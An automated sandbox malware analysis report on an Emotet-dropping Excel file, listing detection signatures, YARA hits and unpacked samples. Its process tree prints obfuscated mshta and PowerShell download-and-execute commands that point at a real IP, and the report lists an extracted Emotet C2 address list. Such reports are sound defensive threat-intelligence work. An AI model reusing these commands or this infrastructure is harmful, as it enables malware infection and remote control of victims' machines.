Edit tour

Windows Analysis Report
364453688149503140239183.xls

Overview

General Information

Sample Name:	364453688149503140239183.xls
Analysis ID:	562430
MD5:	4097bbda61bfb39067eab29fb342e34e
SHA1:	ca13a07a1eb59e7b30f217239a0db63235354c49
SHA256:	4d876f4afaf9df30d8b9ecaeddd86defa6dedd94dcaa933d67fe578b9cabdc18
Tags:	SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Multi AV Scanner detection for domain / URL

Sigma detected: Windows Shell File Write to Suspicious Folder

Document contains OLE streams with names of living off the land binaries

Powershell drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Sigma detected: Suspicious MSHTA Process Patterns

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious PowerShell Command Line

Found Excel 4.0 Macro with suspicious formulas

Obfuscated command line found

Machine Learning detection for dropped file

Sigma detected: Mshta Spawning Windows Shell

C2 URLs / IPs found in malware configuration

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to delete services

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

PE file contains an invalid checksum

Yara detected Xls With Macro 4.0

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2232 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cmd.exe (PID: 1760 cmdline: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mshta.exe (PID: 2840 cmdline: mshta http://91.240.118.168/vvv/ppp/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 3004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2852 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 1180 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2672 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2916 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1200 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2424 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2144 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
364453688149503140239183.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x96a2:$s1: Excel 0xa705:$s1: Excel 0x32a3:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
364453688149503140239183.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\364453688149503140239183.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x96a2:$s1: Excel 0xa705:$s1: Excel 0x32a3:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\364453688149503140239183.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security
C:\ProgramData\QWER.dll	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 71 entries

Unpacked PEs

Source	Rule	Description	Author
12.2.rundll32.exe.2a0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.170000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.200000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2e90000.16.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2850000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.380000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.4b0000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.a30000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.b20000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2520000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.cc0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.bd0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2e00000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2820000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.270000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3020000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.a30000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.a30000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.b80000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2860000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.2a0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2820000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2f40000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.1e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.270000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.470000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2e40000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2c90000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2f60000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.24f0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.25e0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.310000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.440000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3a0000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2dd0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.24f0000.9.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.380000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.30b0000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.ac0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.4b0000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2c60000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.b20000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.bd0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2d00000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.b10000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.5a0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.340000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.1e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.b50000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.b50000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.26a0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.cc0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2e80000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2e60000.15.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.4e0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.26d0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2e00000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.a00000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2860000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2c60000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2910000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2fe0000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2fe0000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.8f0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.840000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.210000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2a0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.b50000.7.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.840000.3.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.170000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2e70000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.b00000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2590000.11.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.26a0000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.200000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.350000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1e0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.ae0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2910000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.bc0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3a0000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2d0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2ec0000.17.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.27e0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
